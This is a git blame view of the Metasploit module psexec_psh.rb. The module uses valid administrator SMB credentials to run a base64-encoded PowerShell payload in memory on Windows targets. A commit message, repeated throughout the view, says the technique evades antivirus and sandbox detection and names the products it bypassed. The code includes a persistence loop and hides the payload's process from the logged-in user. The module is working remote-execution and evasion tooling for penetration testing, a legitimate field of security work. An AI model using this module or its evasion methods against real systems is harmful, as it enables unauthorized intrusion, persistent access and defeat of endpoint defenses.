metasploit-framework/modules/exploits/windows/smb/psexec_psh.rb

108 lines
4.0 KiB
Ruby
Raw Normal View History

Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
# -*- coding: binary -*-
2013-07-04 09:08:29 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
require 'msf/core'
2013-07-04 08:58:48 +00:00
require 'msf/core/exploit/powershell'
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ManualRanking
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
2013-08-30 21:28:54 +00:00
# Exploit mixins should be called first
include Msf::Exploit::Remote::SMB::Psexec
include Msf::Exploit::Powershell
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows Authenticated Powershell Command Execution',
'Description' => %q{
This module uses a valid administrator username and password to execute a powershell
payload using a similar technique to the "psexec" utility provided by SysInternals. The
payload is encoded in base64 and executed from the commandline using the -encodedcommand
flag. Using this method, the payload is never written to disk, and given that each payload
is unique, is less prone to signature based detection. Since executing shellcode in .NET
requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
must match that of the payload. Lastly, a persist option is provided to execute the payload
in a while loop in order to maintain a form of persistence. In the event of a sandbox
observing PSH execution, a delay and other obfuscation may be added to avoid detection.
In order to avoid interactive process notifications for the current user, the psh payload has
been reduced in size and wrapped in a powershell invocation which hides the process entirely.
},
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
2013-08-30 21:28:54 +00:00
'Author' => [
'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
],
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
2013-08-30 21:28:54 +00:00
'License' => MSF_LICENSE,
'Privileged' => true,
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 8192,
'DisableNops' => true,
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 01 1999',
'References' => [
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'],
[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
[ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
]
))
end
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
2013-08-30 21:28:54 +00:00
def exploit
command = cmd_psh_payload(payload.encoded)
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
2013-08-30 21:28:54 +00:00
if datastore['PERSIST'] and not datastore['DisablePayloadHandler']
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PERSIST option.")
end
2013-07-04 09:30:03 +00:00
2013-08-30 21:28:54 +00:00
if datastore['RUN_WOW64'] and target_arch.first == "x86_64"
fail_with(Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
end
2013-07-04 10:46:34 +00:00
2013-08-30 21:28:54 +00:00
# Try and authenticate with given credentials
if connect
begin
smb_login
rescue StandardError => autherror
disconnect
fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
end
# Execute the powershell command
print_status("#{peer} - Executing the payload...")
begin
return psexec(command)
rescue StandardError => exec_command_error
disconnect
fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
end
end
end
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
2013-08-30 21:28:54 +00:00
def peer
return "#{rhost}:#{rport}"
end
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
end
2013-07-04 11:02:32 +00:00